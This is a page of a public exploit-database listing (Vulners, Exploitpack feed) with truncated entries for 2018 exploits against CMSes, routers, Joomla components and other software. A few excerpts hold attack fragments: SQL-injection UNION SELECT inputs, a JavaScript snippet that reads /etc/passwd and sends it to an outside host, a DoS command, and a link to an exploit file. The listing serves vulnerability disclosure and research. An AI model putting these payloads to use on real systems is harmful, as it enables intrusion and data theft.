Exploitpack - Page 71 of Exploitpack Vulnerabilities List | Vulners.com

ExploitpackRecent

Recent Most viewed

41207 matches found

exploitpack•added 2018/02/13 12:0 a.m.•13 views

Flash ActiveX 18.0.0.194 - Code Execution

Flash ActiveX 18.0.0.194 - Code Execution CVE-2015-5112 Pop up a calculator - Requires Flash ActiveX 18.0.0.194 Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44742.swf...

exploitpack•added 2018/02/13 12:0 a.m.•11 views

TypeSetter CMS 5.1 - Cross-Site Request Forgery

TypeSetter CMS 5.1 - Cross-Site Request Forgery Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/...

exploitpack•added 2018/02/13 12:0 a.m.•17 views

TypeSetter CMS 5.1 - Host Header Injection

TypeSetter CMS 5.1 - Host Header Injection Exploit Title: TypeSetter CMS 5.1 Host Header Injection Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/ Version: 5.1...

exploitpack•added 2018/02/12 12:0 a.m.•23 views

LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution

LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary:...

exploitpack•added 2018/02/12 12:0 a.m.•22 views

LogicalDOC Enterprise 7.7.4 - Directory Traversal

LogicalDOC Enterprise 7.7.4 - Directory Traversal LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free...

exploitpack•added 2018/02/12 12:0 a.m.•33 views

LogicalDOC Enterprise 7.7.4 - User Enumeration

LogicalDOC Enterprise 7.7.4 - User Enumeration LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management...

exploitpack•added 2018/02/11 12:0 a.m.•15 views

Paypal Clone Script 1.0.9 - id acctype SQL Injection

Paypal Clone Script 1.0.9 - id acctype SQL Injection Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection Dork: N/A Date: 2018-02-10 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...

exploitpack•added 2018/02/11 12:0 a.m.•15 views

Readymade Video Sharing Script 3.2 - search SQL Injection

Readymade Video Sharing Script 3.2 - search SQL Injection Exploit Title: Readymade Video Sharing Script - SQL Injection Error Based Google Dork: NA Date: 10.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

exploitpack•added 2018/02/10 12:0 a.m.•12 views

Multi Language Olx Clone Script - Cross-Site Scripting

Multi Language Olx Clone Script - Cross-Site Scripting Exploit Title: Multi Language Olx Clone Script - Stored XSS Date: 08.02.2018 Exploit Author: Varun Bagaria Web: Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/olx-clone/ Category: Web...

exploitpack•added 2018/02/10 12:0 a.m.•16 views

Naukri Clone Script 3.0.3 - indus SQL Injection

Naukri Clone Script 3.0.3 - indus SQL Injection Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection Dork: N/A Date: 2018-02-08 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/ Version:...

exploitpack•added 2018/02/10 12:0 a.m.•48 views

LibreOffice 6.0.1 - WEBSERVICE Remote Arbitrary File Disclosure

LibreOffice 6.0.1 - WEBSERVICE Remote Arbitrary File Disclosure Vulnerability description CVE-2018-6871 First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to...

5CVSS0.4AI score0.46181EPSS

exploitpack•added 2018/02/09 12:0 a.m.•17 views

macOS Kernel - Use-After-Free Due to Lack of Locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort

macOS Kernel - Use-After-Free Due to Lack of Locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort / AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort...

exploitpack•added 2018/02/07 12:0 a.m.•29 views

MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation

MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation / Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date: 03/02/2018 Author: Souhail Hammou Vendor Homepage: https://www.malwarefox.com/ Version: 2.74.0.150 Tested on: Windows 7 32-bit / Windows 10 64-bit CVE:...

4.6CVSS1.1AI score0.01457EPSS

exploitpack•added 2018/02/07 12:0 a.m.•5 views

Online Test Script 2.0.7 - cid SQL Injection

Online Test Script 2.0.7 - cid SQL Injection Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ Version: 2.0.7...

exploitpack•added 2018/02/07 12:0 a.m.•54 views

Cisco ASA - Crash (PoC)

Cisco ASA - Crash PoC Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect...

10CVSS0.1AI score0.92835EPSS

exploitpack•added 2018/02/07 12:0 a.m.•29 views

Android - getpidcon Permission Bypass in KeyStore Service

Android - getpidcon Permission Bypass in KeyStore Service The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many...

exploitpack•added 2018/02/07 12:0 a.m.•11 views

Entrepreneur Dating Script 2.0.2 - Authentication Bypass

Entrepreneur Dating Script 2.0.2 - Authentication Bypass Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...

exploitpack•added 2018/02/07 12:0 a.m.•60 views

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe...

7.5CVSS0.2AI score0.93684EPSS

exploitpack•added 2018/02/07 12:0 a.m.•67 views

Asterisk 13.17.2 - chan_skinny Remote Memory Corruption

Asterisk 13.17.2 - chanskinny Remote Memory Corruption Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory...

5CVSS0.2AI score0.80582EPSS

exploitpack•added 2018/02/06 12:0 a.m.•14 views

Marked2 - Local File Disclosure

Marked2 - Local File Disclosure var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest;...

exploitpack•added 2018/02/05 12:0 a.m.•27 views

Matrimonial Website Script 2.1.6 - uid SQL Injection

Matrimonial Website Script 2.1.6 - uid SQL Injection Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection Dork: N/A Date: 2018-02-03 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...

exploitpack•added 2018/02/05 12:0 a.m.•20 views

NixCMS 1.0 - category_id SQL Injection

NixCMS 1.0 - categoryid SQL Injection Exploit Title: NixCMS 1.0 - 'categoryid' SQL Ýnjection Dork: N/A Date: 03.02.2018 Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan...

exploitpack•added 2018/02/05 12:0 a.m.•24 views

Joomla! Component jLike 1.0 - Information Leak

Joomla! Component jLike 1.0 - Information Leak "; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ?...

5CVSS7.6AI score0.15026EPSS

exploitpack•added 2018/02/05 12:0 a.m.•27 views

Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection

Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection input name="id" value="-11 UNION ALL SELECT...

7.5CVSS0.4AI score0.01411EPSS

exploitpack•added 2018/02/05 12:0 a.m.•9 views

Student Profile Management System Script 2.0.6 - Authentication Bypass

Student Profile Management System Script 2.0.6 - Authentication Bypass Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Dork: "Powered by: i-Net Solution" Date: 2018-02-06 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendo...

exploitpack•added 2018/02/05 12:0 a.m.•23 views

Wonder CMS 2.3.1 - Host Header Injection

Wonder CMS 2.3.1 - Host Header Injection Exploit Title: Wonder CMS 2.3.1 Host Header Injection Date: 30-01-2018 Exploit Author: Samrat Das Contact: http://twitter.com/SamratDas93 Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.wondercms.com/ Version: 2.3.1 CVE :...

5CVSS0.11226EPSS

exploitpack•added 2018/02/05 12:0 a.m.•17 views

Claymore Dual GPU Miner 10.5 - Format String

Claymore Dual GPU Miner 10.5 - Format String Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service. After reading about the...

exploitpack•added 2018/02/05 12:0 a.m.•37 views

Netis WF2419 Router - Cross-Site Scripting

Netis WF2419 Router - Cross-Site Scripting Exploit Title: Netis-WF2419 HTML Injection Date: 20/01/2018 Exploit Author: Sajibe Kanti Author Contact :https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419 , V3.2.41381 Tested on: Windows 10 CEV :...

3.5CVSS0.1AI score0.00188EPSS

exploitpack•added 2018/02/05 12:0 a.m.•66 views

HPE iLO 4 2.53 - Add New Administrator User

HPE iLO 4 2.53 - Add New Administrator User !/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP:...

10CVSS0.1AI score0.94254EPSS

exploitpack•added 2018/02/05 12:0 a.m.•24 views

MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation

MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation / Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date : 02/02/2018 Author : Souhail Hammou Vendor Homepage : https://www.malwarefox.com/ Version : 2.74.0.150 Tested on : Windows 7 32-bit / Windows 10 64-bit CVE...

4.6CVSS0.7AI score0.00338EPSS

exploitpack•added 2018/02/05 12:0 a.m.•23 views

BOCHS 2.6-5 - Local Buffer Overflow

BOCHS 2.6-5 - Local Buffer Overflow Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a...

exploitpack•added 2018/02/05 12:0 a.m.•31 views

Online Voting System - Authentication Bypass

Online Voting System - Authentication Bypass Exploit Title: Online Voting System - Authentication Bypass Date: 02.02.2018 Vendor Homepage: http://themashabrand.com Software Link: http://themashabrand.com/p/votin Demo: http://localhost/Onlinevoting Version: 1.0 Category: Webapps Exploit Author:...

5CVSS0.3AI score0.15375EPSS

exploitpack•added 2018/02/05 12:0 a.m.•23 views

Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection

Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection input name="id" value="-11 UNION ALL SELECT...

7.5CVSS10AI score0.92038EPSS

exploitpack•added 2018/02/05 12:0 a.m.•23 views

WordPress Core - load-scripts.php Denial of Service

WordPress Core - load-scripts.php Denial of Service EDB Note: python doser.py -g...

exploitpack•added 2018/02/05 12:0 a.m.•23 views

Wonder CMS 2.3.1 - Unrestricted File Upload

Wonder CMS 2.3.1 - Unrestricted File Upload Affected Code: public static function uploadFile + - if ! wCMS::$loggedIn && ! isset$FILES'uploadFile' && ! isset$REQUEST'token' return; + private static function uploadFileAction - if isset$REQUEST'token' && $REQUEST'token' == wCMS::generateToken &&...

exploitpack•added 2018/02/05 12:0 a.m.•28 views

Joomla! Component Zh YandexMap 6.2.1.0 - id SQL Injection

Joomla! Component Zh YandexMap 6.2.1.0 - id SQL Injection input name="id" value="-11 UNION ALL SELECT...

7.5CVSS0.2AI score0.01411EPSS

exploitpack•added 2018/02/05 12:0 a.m.•23 views

Joomla! Component JSP Tickets 1.1 - SQL Injection

Joomla! Component JSP Tickets 1.1 - SQL Injection Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link:...

7.5CVSS0.3AI score0.02589EPSS

exploitpack•added 2018/02/02 12:0 a.m.•18 views

Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection

Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link:...

exploitpack•added 2018/02/02 12:0 a.m.•17 views

Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload

Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload Dork: N/A Date: 01.02.2018 Vendor Homepage: http://janguo.de/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtaw...

exploitpack•added 2018/02/02 12:0 a.m.•18 views

Advance Loan Management System - id SQL Injection

Advance Loan Management System - id SQL Injection Exploit Title: Advance Loan Management System - 'id' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link:...

exploitpack•added 2018/02/02 12:0 a.m.•22 views

Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation

Microsoft Windows Subsystem for Linux - execve Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x...

exploitpack•added 2018/02/02 12:0 a.m.•34 views

Real Estate Custom Script - route SQL Injection

Real Estate Custom Script - route SQL Injection Exploit Title: Real Estate Custom Script - 'route' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075 Version: 1.0 Tested on:...

exploitpack•added 2018/02/02 12:0 a.m.•14 views

Joomla! Component JMS Music 1.1.1 - SQL Injection

Joomla! Component JMS Music 1.1.1 - SQL Injection Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: https://www.joommasters.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/...

exploitpack•added 2018/02/02 12:0 a.m.•23 views

FiberHome AN5506 - Remote DNS Change

FiberHome AN5506 - Remote DNS Change FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability Software Version RP2617 Device Model AN5506-04-F Vendor Homepage: www.fiberhome.com/ Date: 01/02/2018 Exploit Author: r0ots3c http://wandoelmo.com.br https://www.facebook.com/wsec.info Descriptio...

exploitpack•added 2018/02/02 12:0 a.m.•21 views

Fancy Clone Script - search_browse_product SQL Injection

Fancy Clone Script - searchbrowseproduct SQL Injection Exploit Title: Fancy Clone Script - 'searchbrowseproduct' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://pofitec.com/ Software Link: https://pofitec.com/fancy-clone-script.php Version: 1.0 Tested on: Kali Linu...

exploitpack•added 2018/02/02 12:0 a.m.•12 views

Joomla! Component JE PayperVideo 3.0.0 - usr_plan SQL Injection

Joomla! Component JE PayperVideo 3.0.0 - usrplan SQL Injection...

exploitpack•added 2018/02/02 12:0 a.m.•15 views

Joomla! Component JEXTN Membership 3.1.0 - usr_plan SQL Injection

Joomla! Component JEXTN Membership 3.1.0 - usrplan SQL Injection...

exploitpack•added 2018/02/02 12:0 a.m.•16 views

IPSwitch MOVEit 8.1 9.4 - Cross-Site Scripting

IPSwitch MOVEit 8.1 9.4 - Cross-Site Scripting Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting XSS Date: 1-31-2017 Software Link: https://www.ipswitch.com/moveit Affected Version: 8.1-9.4 only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable Exploit Author:...

exploitpack•added 2018/02/02 12:0 a.m.•12 views

Event Manager 1.0 - SQL Injection

Event Manager 1.0 - SQL Injection Exploit Title: Event Manager PHP Script 1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://ezcode.pt/ Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741 Version: 1.0 Category: Webapps Tested on:...

exploitpack•added 2018/02/02 12:0 a.m.•16 views

Joomla! Component JEXTN Classified 1.0.0 - sid SQL Injection

Joomla! Component JEXTN Classified 1.0.0 - sid SQL Injection Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link:...

Total number of security vulnerabilities41207